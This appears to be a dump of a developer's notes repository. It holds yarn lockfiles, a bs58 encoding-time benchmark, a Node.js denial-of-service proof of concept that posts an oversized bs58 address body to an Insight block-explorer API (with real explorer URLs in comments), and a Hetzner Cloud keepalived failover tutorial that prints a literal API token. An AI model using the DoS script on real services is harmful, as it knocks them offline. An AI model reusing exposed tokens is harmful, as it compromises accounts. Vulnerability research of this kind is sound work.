sha512-MJG9liiZ+ogc4TzUwuvbER1JRdgvUFSB5+VR/g5h82fGaIRWMWddtKBHi7/sVhfjQZ6SehlyhvQYrcYkaUIpLg== 69 | dependencies: 70 | cipher-base "^1.0.3" 71 | create-hash "^1.1.0" 72 | inherits "^2.0.1" 73 | ripemd160 "^2.0.0" 74 | safe-buffer "^5.0.1" 75 | sha.js "^2.4.8" 76 | 77 | drbg.js@^1.0.1: 78 | version "1.0.1" 79 | resolved "https://registry.yarnpkg.com/drbg.js/-/drbg.js-1.0.1.tgz#3e36b6c42b37043823cdbc332d58f31e2445480b" 80 | integrity sha1-Pja2xCs3BDgjzbwzLVjzHiRFSAs= 81 | dependencies: 82 | browserify-aes "^1.0.6" 83 | create-hash "^1.1.2" 84 | create-hmac "^1.1.4" 85 | 86 | elliptic@^6.4.1: 87 | version "6.5.0" 88 | resolved "https://registry.yarnpkg.com/elliptic/-/elliptic-6.5.0.tgz#2b8ed4c891b7de3200e14412a5b8248c7af505ca" 89 | integrity sha512-eFOJTMyCYb7xtE/caJ6JJu+bhi67WCYNbkGSknu20pmM8Ke/bqOfdnZWxyoGN26JgfxTbXrsCkEw4KheCT/KGg== 90 | dependencies: 91 | bn.js "^4.4.0" 92 | brorand "^1.0.1" 93 | hash.js "^1.0.0" 94 | hmac-drbg "^1.0.0" 95 | inherits "^2.0.1" 96 | minimalistic-assert "^1.0.0" 97 | minimalistic-crypto-utils "^1.0.0" 98 | 99 | evp_bytestokey@^1.0.3: 100 | version "1.0.3" 101 | resolved "https://registry.yarnpkg.com/evp_bytestokey/-/evp_bytestokey-1.0.3.tgz#7fcbdb198dc71959432efe13842684e0525acb02" 102 | integrity sha512-/f2Go4TognH/KvCISP7OUsHn85hT9nUkxxA9BEWxFn+Oj9o8ZNLm/40hdlgSLyuOimsrTKLUMEorQexp/aPQeA== 103 | dependencies: 104 | md5.js "^1.3.4" 105 | safe-buffer "^5.1.1" 106 | 107 | file-uri-to-path@1.0.0: 108 | version "1.0.0" 109 | resolved "https://registry.yarnpkg.com/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz#553a7b8446ff6f684359c445f1e37a05dacc33dd" 110 | integrity sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw== 111 | 112 | hash-base@^3.0.0: 113 | version "3.0.4" 114 | resolved "https://registry.yarnpkg.com/hash-base/-/hash-base-3.0.4.tgz#5fc8686847ecd73499403319a6b0a3f3f6ae4918" 115 | integrity sha1-X8hoaEfs1zSZQDMZprCj8/auSRg= 116 | dependencies: 117 | inherits "^2.0.1" 118 | safe-buffer "^5.0.1" 119 | 120 | hash.js@^1.0.0, hash.js@^1.0.3: 121 | version "1.1.7" 122 | resolved "https://registry.yarnpkg.com/hash.js/-/hash.js-1.1.7.tgz#0babca538e8d4ee4a0f8988d68866537a003cf42" 123 | integrity sha512-taOaskGt4z4SOANNseOviYDvjEJinIkRgmp7LbKP2YTTmVxWBl87s/uzK9r+44BclBSp2X7K1hqeNfz9JbBeXA== 124 | dependencies: 125 | inherits "^2.0.3" 126 | minimalistic-assert "^1.0.1" 127 | 128 | hmac-drbg@^1.0.0: 129 | version "1.0.1" 130 | resolved "https://registry.yarnpkg.com/hmac-drbg/-/hmac-drbg-1.0.1.tgz#d2745701025a6c775a6c545793ed502fc0c649a1" 131 | integrity sha1-0nRXAQJabHdabFRXk+1QL8DGSaE= 132 | dependencies: 133 | hash.js "^1.0.3" 134 | minimalistic-assert "^1.0.0" 135 | minimalistic-crypto-utils "^1.0.1" 136 | 137 | inherits@^2.0.1, inherits@^2.0.3: 138 | version "2.0.4" 139 | resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.4.tgz#0fa2c64f932917c3433a0ded55363aae37416b7c" 140 | integrity sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ== 141 | 142 | md5.js@^1.3.4: 143 | version "1.3.5" 144 | resolved "https://registry.yarnpkg.com/md5.js/-/md5.js-1.3.5.tgz#b5d07b8e3216e3e27cd728d72f70d1e6a342005f" 145 | integrity sha512-xitP+WxNPcTTOgnTJcrhM0xvdPepipPSf3I8EIpGKeFLjt3PlJLIDG3u8EX53ZIubkb+5U2+3rELYpEhHhzdkg== 146 | dependencies: 147 | hash-base "^3.0.0" 148 | inherits "^2.0.1" 149 | safe-buffer "^5.1.2" 150 | 151 | minimalistic-assert@^1.0.0, minimalistic-assert@^1.0.1: 152 | version "1.0.1" 153 | resolved 
"https://registry.yarnpkg.com/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz#2e194de044626d4a10e7f7fbc00ce73e83e4d5c7" 154 | integrity sha512-UtJcAD4yEaGtjPezWuO9wC4nwUnVH/8/Im3yEHQP4b67cXlD/Qr9hdITCU1xDbSEXg2XKNaP8jsReV7vQd00/A== 155 | 156 | minimalistic-crypto-utils@^1.0.0, minimalistic-crypto-utils@^1.0.1: 157 | version "1.0.1" 158 | resolved "https://registry.yarnpkg.com/minimalistic-crypto-utils/-/minimalistic-crypto-utils-1.0.1.tgz#f6c00c1c0b082246e5c4d99dfb8c7c083b2b582a" 159 | integrity sha1-9sAMHAsIIkblxNmd+4x8CDsrWCo= 160 | 161 | nan@^2.14.0: 162 | version "2.14.0" 163 | resolved "https://registry.yarnpkg.com/nan/-/nan-2.14.0.tgz#7818f722027b2459a86f0295d434d1fc2336c52c" 164 | integrity sha512-INOFj37C7k3AfaNTtX8RhsTw7qRy7eLET14cROi9+5HAVbbHuIWUHEauBv5qT4Av2tWasiTY1Jw6puUNqRJXQg== 165 | 166 | ripemd160@^2.0.0, ripemd160@^2.0.1: 167 | version "2.0.2" 168 | resolved "https://registry.yarnpkg.com/ripemd160/-/ripemd160-2.0.2.tgz#a1c1a6f624751577ba5d07914cbc92850585890c" 169 | integrity sha512-ii4iagi25WusVoiC4B4lq7pbXfAp3D9v5CwfkY33vffw2+pkDjY1D8GaN7spsxvCSx8dkPqOZCEZyfxcmJG2IA== 170 | dependencies: 171 | hash-base "^3.0.0" 172 | inherits "^2.0.1" 173 | 174 | safe-buffer@^5.0.1, safe-buffer@^5.1.1, safe-buffer@^5.1.2: 175 | version "5.2.0" 176 | resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.2.0.tgz#b74daec49b1148f88c64b68d49b1e815c1f2f519" 177 | integrity sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg== 178 | 179 | secp256k1@^3.7.1: 180 | version "3.7.1" 181 | resolved "https://registry.yarnpkg.com/secp256k1/-/secp256k1-3.7.1.tgz#12e473e0e9a7c2f2d4d4818e722ad0e14cc1e2f1" 182 | integrity sha512-1cf8sbnRreXrQFdH6qsg2H71Xw91fCCS9Yp021GnUNJzWJS/py96fS4lHbnTnouLp08Xj6jBoBB6V78Tdbdu5g== 183 | dependencies: 184 | bindings "^1.5.0" 185 | bip66 "^1.1.5" 186 | bn.js "^4.11.8" 187 | create-hash "^1.2.0" 188 | drbg.js "^1.0.1" 189 | elliptic "^6.4.1" 190 | nan "^2.14.0" 191 | safe-buffer "^5.1.2" 192 | 193 | sha.js@^2.4.0, sha.js@^2.4.8: 194 | version "2.4.11" 195 | resolved "https://registry.yarnpkg.com/sha.js/-/sha.js-2.4.11.tgz#37a5cf0b81ecbc6943de109ba2960d1b26584ae7" 196 | integrity sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ== 197 | dependencies: 198 | inherits "^2.0.1" 199 | safe-buffer "^5.0.1" 200 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/bs58-time.js: -------------------------------------------------------------------------------- 1 | const worker = require('worker_threads') 2 | 3 | async function mainMaster () { 4 | const path = require('path') 5 | const os = require('os') 6 | const ProgressBar = require('progress') 7 | const plt = require('matplotnode') 8 | 9 | const data = { length: [], time: [] } 10 | const lengthArr = new Array(101).fill(null).map((x, i) => Math.max(10, i * 1000)) 11 | 12 | const threads = Math.max(1, (os.cpus().length / 4) >>> 0) 13 | const bar = new ProgressBar(':bar :percent', { total: lengthArr.length, width: Math.min(80, process.stdout.columns || 50) }) 14 | bar.render() 15 | await Promise.all(new Array(threads).fill(null).map(() => { 16 | return new Promise((resolve) => { 17 | const wrk = new worker.Worker(__filename) 18 | 19 | wrk.on('error', (err) => console.error(`Error from worker#${wrk.threadId}: ${err.message}`)) 20 | wrk.on('exit', (code) => { 21 | if (code !== 0) { 22 | console.error(`Worker#${wrk.threadId} exited with code ${code}`) 23 | } 24 | 
25 | resolve() 26 | }) 27 | 28 | wrk.on('message', (result) => { 29 | if (result !== null) { 30 | data.length.push(result.length) 31 | data.time.push(result.time) 32 | bar.tick() 33 | } 34 | 35 | wrk.postMessage(lengthArr.pop()) 36 | }) 37 | }) 38 | })) 39 | bar.render() 40 | 41 | plt.title('bs58 time/length') 42 | plt.xlabel('length, symbols') 43 | plt.ylabel('time, ms') 44 | plt.plot(data.length, data.time, 'marker=.', 'linestyle=None') 45 | plt.save(path.join(__dirname, `${path.parse(__filename).name}.png`)) 46 | } 47 | 48 | async function mainSlave () { 49 | const bs58 = require('bs58') 50 | bs58.encode(Buffer.allocUnsafe(1000).fill(0xff)) // warm-up 51 | 52 | worker.parentPort.on('message', (length) => { 53 | if (length === undefined) { 54 | worker.parentPort.unref() 55 | return 56 | } 57 | 58 | const ts = process.hrtime() 59 | const size = ((length * (Math.log(58) / Math.log(256))) + 1) >>> 0 60 | bs58.encode(Buffer.allocUnsafe(size).fill(0xff)) 61 | const diff = process.hrtime(ts) 62 | const time = diff[0] * 1e3 + diff[1] / 1e6 63 | 64 | worker.parentPort.postMessage({ length, time }) 65 | }) 66 | 67 | worker.parentPort.postMessage(null) 68 | } 69 | 70 | (worker.isMainThread ? mainMaster : mainSlave)().catch((err) => { 71 | console.error(err.stack || err.message) 72 | process.exit(1) 73 | }) 74 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/bs58-time.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fanatid/notes/b1f16cd98e547cd7dfe887548b546e5ca6669cdc/2019-08-04-dos-insight-api/bs58-time-chart/bs58-time.png -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "bs58": "^4.0.1", 4 | "matplotnode": "^0.4.2", 5 | "progress": "^2.0.3" 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 
2 | # yarn lockfile v1 3 | 4 | 5 | base-x@^3.0.2: 6 | version "3.0.6" 7 | resolved "https://registry.yarnpkg.com/base-x/-/base-x-3.0.6.tgz#de047ec95f5f7b99ae63d830a2a894c96538b2cd" 8 | integrity sha512-4PaF8u2+AlViJxRVjurkLTxpp7CaFRD/jo5rPT9ONnKxyhQ8f59yzamEvq7EkriG56yn5On4ONyaG75HLqr46w== 9 | dependencies: 10 | safe-buffer "^5.0.1" 11 | 12 | bs58@^4.0.1: 13 | version "4.0.1" 14 | resolved "https://registry.yarnpkg.com/bs58/-/bs58-4.0.1.tgz#be161e76c354f6f788ae4071f63f34e8c4f0a42a" 15 | integrity sha1-vhYedsNU9veIrkBx9j806MTwpCo= 16 | dependencies: 17 | base-x "^3.0.2" 18 | 19 | matplotnode@^0.4.2: 20 | version "0.4.2" 21 | resolved "https://registry.yarnpkg.com/matplotnode/-/matplotnode-0.4.2.tgz#9ddc508f798eac458fdfcf89a315981b7d8ecbc2" 22 | integrity sha512-PvamLgebQbPQ9eJs8bkyODnabWRmKivAAgEuP9Kg8gpXiEUwPFL3cPfLfZtHQhqYCwmzjIsMjrWfz2UPf2jrUA== 23 | 24 | progress@^2.0.3: 25 | version "2.0.3" 26 | resolved "https://registry.yarnpkg.com/progress/-/progress-2.0.3.tgz#7e8cf8d8f5b8f239c1bc68beb4eb78567d572ef8" 27 | integrity sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA== 28 | 29 | safe-buffer@^5.0.1: 30 | version "5.2.0" 31 | resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.2.0.tgz#b74daec49b1148f88c64b68d49b1e815c1f2f519" 32 | integrity sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg== 33 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/gen-post-body.js: -------------------------------------------------------------------------------- 1 | const fs = require('fs') 2 | const path = require('path') 3 | 4 | const bs58 = require('bs58') 5 | bs58.encode(Buffer.allocUnsafe(1000).fill(0xff)) // warm-up 6 | 7 | const ssize = 99980 8 | const size = ((ssize * (Math.log(58) / Math.log(256))) + 1) >>> 0 9 | const bs58s = bs58.encode(Buffer.allocUnsafe(size).fill(0xff)) 10 | fs.writeFileSync(path.join(__dirname, 'insight-dos-addrs.json'), `{"addrs":"${bs58s}"}`, 'utf-8') 11 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/insight-dos.js: -------------------------------------------------------------------------------- 1 | const https = require('https') 2 | const fs = require('fs') 3 | const path = require('path') 4 | 5 | const insightURL = null 6 | // const insightURL = 'https://insight.bitpay.com' 7 | // const insightURL = 'https://ravencoin.network' 8 | // const insightURL = 'https://blockdozer.com' 9 | // const insightURL = 'https://digiexplorer.info' 10 | 11 | async function makeRequest (url, opts, data) { 12 | return new Promise((resolve, reject) => { 13 | const req = https.request(url, opts) 14 | req.on('error', reject) 15 | req.on('timeout', () => { 16 | req.abort() 17 | reject(new Error('Timeout error')) 18 | }) 19 | req.on('response', (resp) => { 20 | if (resp.statusCode !== 200) { 21 | return reject(new Error(resp.statusMessage)) 22 | } 23 | 24 | const chunks = [] 25 | resp.on('data', (chunk) => chunks.push(chunk)) 26 | resp.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) 27 | }) 28 | 29 | req.end(data) 30 | }) 31 | } 32 | 33 | async function getBestBlockHash (timeout) { 34 | try { 35 | const data = await makeRequest(`${insightURL}/api/status?q=getBestBlockHash`, { timeout }) 36 | return JSON.parse(data).bestblockhash 37 | } catch (err) { 38 | if (err.message === 'Timeout error') return 'Timeout' 39 | 40 | throw err 
41 | } 42 | } 43 | 44 | let callDoSId = 0 45 | const callDoSBody = fs.readFileSync(path.join(__dirname, `${path.parse(__filename).name}-body.json`), 'utf-8').trim() 46 | async function callDoS () { 47 | const id = ++callDoSId 48 | log(`Start DoS call id#${id}`) 49 | const ts = diffTime() 50 | try { 51 | const headers = { 'Content-Type': 'application/json' } 52 | await makeRequest(`${insightURL}/api/addrs/utxo`, { method: 'POST', headers }, callDoSBody) 53 | } catch (err) { 54 | log(`DoS call id#${id} error: ${err.message}`) 55 | } 56 | log(`DoS call id#${id} done in ${diffTime(ts).toFixed(2)}ms`) 57 | } 58 | 59 | function log (msg) { 60 | console.log(`${new Date().toISOString()} ${msg}`) 61 | } 62 | 63 | function diffTime (time) { 64 | if (time === undefined) return process.hrtime() 65 | 66 | const diff = process.hrtime(time) 67 | return diff[0] * 1e3 + diff[1] / 1e6 68 | } 69 | 70 | async function delay (ms) { 71 | await new Promise((resolve) => setTimeout(resolve, ms).unref()) 72 | } 73 | 74 | ;(async () => { 75 | const count = 1 76 | const dos = Promise.all(new Array(count).fill(null).map(async (x, i) => { 77 | await delay(i * 200) 78 | await callDoS() 79 | })).then(() => 'done') 80 | 81 | const getStatus = async (timeout) => { 82 | const ts = diffTime() 83 | const hash = await getBestBlockHash(timeout) 84 | const diff = diffTime(ts) 85 | log(`Best hash: ${hash} (${diff.toFixed(2)}ms)`) 86 | return diff 87 | } 88 | 89 | while (true) { 90 | const callTimeout = 3000 91 | const elapsed = await getStatus(callTimeout) 92 | 93 | const timeout = Math.max(100, callTimeout - elapsed) 94 | const st = await Promise.race([dos, delay(timeout)]) 95 | if (st === 'done') break 96 | } 97 | 98 | await getStatus(30000) 99 | })().catch((err) => { 100 | console.error(err.stack || err) 101 | process.exit(1) 102 | }) 103 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "bs58": "^4.0.1" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 
2 | # yarn lockfile v1 3 | 4 | 5 | base-x@^3.0.2: 6 | version "3.0.6" 7 | resolved "https://registry.yarnpkg.com/base-x/-/base-x-3.0.6.tgz#de047ec95f5f7b99ae63d830a2a894c96538b2cd" 8 | integrity sha512-4PaF8u2+AlViJxRVjurkLTxpp7CaFRD/jo5rPT9ONnKxyhQ8f59yzamEvq7EkriG56yn5On4ONyaG75HLqr46w== 9 | dependencies: 10 | safe-buffer "^5.0.1" 11 | 12 | bs58@^4.0.1: 13 | version "4.0.1" 14 | resolved "https://registry.yarnpkg.com/bs58/-/bs58-4.0.1.tgz#be161e76c354f6f788ae4071f63f34e8c4f0a42a" 15 | integrity sha1-vhYedsNU9veIrkBx9j806MTwpCo= 16 | dependencies: 17 | base-x "^3.0.2" 18 | 19 | safe-buffer@^5.0.1: 20 | version "5.2.0" 21 | resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.2.0.tgz#b74daec49b1148f88c64b68d49b1e815c1f2f519" 22 | integrity sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg== 23 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/README.md: -------------------------------------------------------------------------------- 1 | # Internal failover IP in Hetzner Cloud 2 | 3 | It's great when in the cloud you can just click a few buttons or create a highly-available load balancer through an API (or with tools like [Terraform](https://www.terraform.io/)). But what if you need to implement custom checks, or your cloud does not provide HA load balancers? Or, even more, what if you use bare metal? In such cases you can implement it yourself. 4 | 5 | In this note I'll describe how IP failover can be done in [Hetzner Cloud](https://www.hetzner.com/cloud). I'll talk about an internal failover IP, but implementing the same for a public address should not be much different. 6 | 7 | ### Infrastructure 8 | 9 | ![Alt text](https://g.gravizo.com/source/graphviz1?https://raw.githubusercontent.com/fanatid/notes/master/2019-08-06-hetzner-cloud-internal-failover-ip/README.md) 10 | 54 | 55 | We will create 3 servers (`cx11` is enough for us here); the one with IP `10.0.2.1` we will use for sending HTTP requests to `10.0.1.1`. On the two other servers we will start nginx, which will reply with the server hostname. If one of them goes down, the other should re-assign the IP `10.0.1.1` to itself and reply to HTTP requests. The HTTP response, of course, will change. 56 | 57 | I created Terraform code, so all of this can be easily created with a few commands (do not forget to change the Hetzner API Token and SSH key in [tf/variables.tf](tf/variables.tf)!): 58 | 59 | ```bash 60 | terraform init 61 | terraform apply 62 | ``` 63 | 64 | After apply, you should see output close to this: 65 | 66 | ```bash 67 | Apply complete! Resources: 10 added, 0 changed, 0 destroyed. 68 | 69 | Outputs: 70 | 71 | ip4_map = { 72 | "10.0.1.2" = "116.203.202.19" 73 | "10.0.1.3" = "159.69.190.43" 74 | "10.0.2.1" = "116.203.201.188" 75 | } 76 | nginx0_cmd = hcloud server change-alias-ips --network 7578 --clear 3080230 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080229 77 | nginx1_cmd = hcloud server change-alias-ips --network 7578 --clear 3080229 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080230 78 | ``` 79 | 80 | Here you can see the public IP addresses for connecting through SSH. The next two lines are commands which we will need later; for now just save them. 81 | 82 | ### Keepalived 83 | 84 | For creating the failover IP we will use [keepalived](https://www.keepalived.org/).
85 | 86 | On both nginx servers (`10.0.1.2` & `10.0.1.3`) we need to do almost identical actions: 87 | 88 | 1) Install [nginx](https://nginx.org/) and `keepalived`: 89 | 90 | ```bash 91 | apt install -y nginx keepalived 92 | ``` 93 | 94 | and save the `hostname` to `index.html`: 95 | 96 | ```bash 97 | hostname > /var/www/html/index.html 98 | ``` 99 | 100 | 2) Install [hcloud](https://github.com/hetznercloud/cli): 101 | 102 | `hcloud` is the command-line tool for Hetzner Cloud. The problem is that the servers do not choose IPs themselves; instead we assign IPs through the API, then Hetzner Cloud attaches a network interface to the VM, where the OS starts a DHCP client which asks for an IP and receives the one we assigned. We can also add alias IPs, but they need to be added manually (`ip address add 10.0.1.1 dev ens10`). So, if we want a floating IP in a Hetzner Private Network, we need to set an IP for each server and add an alias which can be assigned to only one server at a time. If the server with the aliased IP goes down, we need to automatically re-assign the alias to another server, and for this we will use `hcloud`. Unfortunately, for this we need to use the Hetzner API Token. 103 | 104 | ```bash 105 | curl --location --silent --output - https://github.com/hetznercloud/cli/releases/download/v1.13.0/hcloud-linux-amd64-v1.13.0.tar.gz | tar -zxO hcloud-linux-amd64-v1.13.0/bin/hcloud > /usr/local/bin/hcloud 106 | chmod +x /usr/local/bin/hcloud 107 | 108 | vim /etc/keepalived/ens10-ip.sh 109 | chmod 700 /etc/keepalived/ens10-ip.sh 110 | ``` 111 | 112 | I show an example with `vim` because if we ran a command which adds the content to the script, the token would be stored in `~/.bash_history` for some time. It's also important to set permission `700`, because only `root` should have access to this script, due to the Token. 113 | 114 | Content for `nginx0`: 115 | 116 | ```bash 117 | export HCLOUD_TOKEN=xKUf7qJRrGUNKmDsn5RgrfXt2xgy90rSOhElVGZm18tx3nhTYCqgLVwIHR0mKn0y 118 | hcloud server change-alias-ips --network 7578 --clear 3080230 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080229 119 | ``` 120 | 121 | Content for `nginx1`: 122 | 123 | ```bash 124 | export HCLOUD_TOKEN=xKUf7qJRrGUNKmDsn5RgrfXt2xgy90rSOhElVGZm18tx3nhTYCqgLVwIHR0mKn0y 125 | hcloud server change-alias-ips --network 7578 --clear 3080229 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080230 126 | ``` 127 | 128 | For the server with hostname `nginx0` we need `nginx0_cmd` from the Terraform output, and for `nginx1`, `nginx1_cmd`. 129 | 130 | What do these commands do? The first command removes all alias IPs from the other server and the second one adds the alias IP to the current server. The commands are identical except that the `Server ID` values at the end of each command are swapped.
131 | 132 | 3) Add configuration for `keepalived`: 133 | 134 | `/etc/keepalived/keepalived.conf`: 135 | 136 | ```bash 137 | global_defs { 138 | script_user root 139 | enable_script_security 140 | } 141 | 142 | vrrp_script chk_nginx { 143 | script "/usr/bin/killall -0 nginx" 144 | interval 1 145 | timeout 1 146 | rise 1 147 | fall 2 148 | } 149 | 150 | vrrp_instance hetzner { 151 | state BACKUP 152 | interface ens10 153 | track_interface { 154 | ens10 155 | } 156 | track_script { 157 | chk_nginx 158 | } 159 | unicast_peer { 160 | 10.0.1.2 161 | 10.0.1.3 162 | } 163 | virtual_router_id 42 164 | priority 100 165 | virtual_ipaddress { 166 | 10.0.1.1/32 dev ens10 167 | } 168 | nopreempt 169 | notify_master /etc/keepalived/ens10-ip.sh 170 | } 171 | ``` 172 | 173 | The config is the same for both servers; `unicast_peer` is used because I did not figure out how to make multicast work in a Hetzner Private Network :confused: (If you know, please let me know!). 174 | 175 | I decided not to create different configs (`MASTER` state vs `BACKUP` state) because I think the nodes should be equal. With the current config only one server will be `MASTER` in the end. The important thing here is that when a server becomes `MASTER`, `keepalived` calls our script, which re-assigns the alias IP to this server. 176 | 177 | We also need to edit `keepalived.service`, because on system startup `keepalived` starts before `ens10` is created, which causes `keepalived` to stop. 178 | 179 | `systemctl edit keepalived.service`: 180 | 181 | ```bash 182 | [Unit] 183 | After=hc-net-ifup@ens10.service 184 | 185 | [Service] 186 | ExecStartPre=/bin/sleep 5 187 | ``` 188 | 189 | Now we can enable and start `keepalived`: `systemctl enable keepalived.service --now`. 190 | 191 | ### Testing 192 | 193 | For testing you need to SSH to the testing server (`10.0.2.1`). Since we just launched `keepalived`, IP `10.0.1.1` should be assigned to some node (obviously it will be the node where `keepalived` started earlier): 194 | 195 | ```bash 196 | curl 10.0.1.1 197 | > nginx0 198 | ``` 199 | 200 | Now we can reboot the `nginx0` server (or shut down `keepalived` / `nginx`) and the IP will be re-assigned to `nginx1`: 201 | 202 | ```bash 203 | curl 10.0.1.1 204 | > nginx1 205 | ``` 206 | 207 | It's a really cool thing!
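If failover does not happen as expected, two quick checks help: `keepalived` adds the VIP to `ens10` only on the node in `MASTER` state, and it logs every state transition to the journal.

```bash
# on nginx0 / nginx1: the node in MASTER state holds 10.0.1.1
ip address show dev ens10 | grep 10.0.1.1

# state transitions and notify script calls are logged by keepalived
journalctl -u keepalived.service | grep -E 'MASTER|BACKUP'
```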
208 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/tf/main.tf: -------------------------------------------------------------------------------- 1 | provider "hcloud" { 2 | version = "~> 1.11" 3 | token = "${var.hcloud_token}" 4 | } 5 | 6 | # SSH keys 7 | resource "hcloud_ssh_key" "default" { 8 | count = "${length(var.ssh_keys)}" 9 | 10 | name = "${keys(var.ssh_keys)[count.index]}" 11 | public_key = "${values(var.ssh_keys)[count.index]}" 12 | } 13 | 14 | # Private Network and subnets 15 | resource "hcloud_network" "default" { 16 | name = "LVS Example" 17 | ip_range = "10.0.0.0/8" 18 | } 19 | 20 | resource "hcloud_network_subnet" "nginx" { 21 | network_id = "${hcloud_network.default.id}" 22 | type = "server" 23 | network_zone = "eu-central" 24 | ip_range = "10.0.1.0/24" 25 | } 26 | 27 | resource "hcloud_network_subnet" "client" { 28 | network_id = "${hcloud_network.default.id}" 29 | type = "server" 30 | network_zone = "eu-central" 31 | ip_range = "10.0.2.0/24" 32 | } 33 | 34 | # NGINX0 35 | resource "hcloud_server" "nginx0" { 36 | name = "nginx0" 37 | image = "ubuntu-18.04" 38 | server_type = "cx11-ceph" 39 | datacenter = "nbg1-dc3" 40 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 41 | } 42 | 43 | resource "hcloud_server_network" "nginx0_network" { 44 | network_id = "${hcloud_network.default.id}" 45 | server_id = "${hcloud_server.nginx0.id}" 46 | ip = "10.0.1.2" 47 | } 48 | 49 | # NGINX1 50 | resource "hcloud_server" "nginx1" { 51 | name = "nginx1" 52 | image = "ubuntu-18.04" 53 | server_type = "cx11-ceph" 54 | datacenter = "fsn1-dc14" 55 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 56 | } 57 | 58 | resource "hcloud_server_network" "nginx1_network" { 59 | network_id = "${hcloud_network.default.id}" 60 | server_id = "${hcloud_server.nginx1.id}" 61 | ip = "10.0.1.3" 62 | } 63 | 64 | # client 65 | resource "hcloud_server" "client" { 66 | name = "client" 67 | image = "ubuntu-18.04" 68 | server_type = "cx11-ceph" 69 | datacenter = "nbg1-dc3" 70 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 71 | } 72 | 73 | resource "hcloud_server_network" "client_network" { 74 | network_id = "${hcloud_network.default.id}" 75 | server_id = "${hcloud_server.client.id}" 76 | ip = "10.0.2.1" 77 | } 78 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/tf/outputs.tf: -------------------------------------------------------------------------------- 1 | output "ip4_map" { 2 | description = "Map of private ipv4 to public ipv4" 3 | value = { 4 | "${hcloud_server_network.nginx0_network.ip}" = "${hcloud_server.nginx0.ipv4_address}" 5 | "${hcloud_server_network.nginx1_network.ip}" = "${hcloud_server.nginx1.ipv4_address}" 6 | "${hcloud_server_network.client_network.ip}" = "${hcloud_server.client.ipv4_address}" 7 | } 8 | } 9 | 10 | output "nginx0_cmd" { 11 | description = "nginx0 cmd for re-assign aliased ip" 12 | value = "hcloud server change-alias-ips --network ${hcloud_network.default.id} --clear ${hcloud_server.nginx1.id} && hcloud server change-alias-ips --network ${hcloud_network.default.id} --alias-ips 10.0.1.1 ${hcloud_server.nginx0.id}" 13 | } 14 | 15 | output "nginx1_cmd" { 16 | description = "nginx1 cmd for re-assign aliased ip" 17 | value = "hcloud server change-alias-ips --network ${hcloud_network.default.id} --clear ${hcloud_server.nginx0.id} && hcloud server change-alias-ips --network ${hcloud_network.default.id} --alias-ips 10.0.1.1 
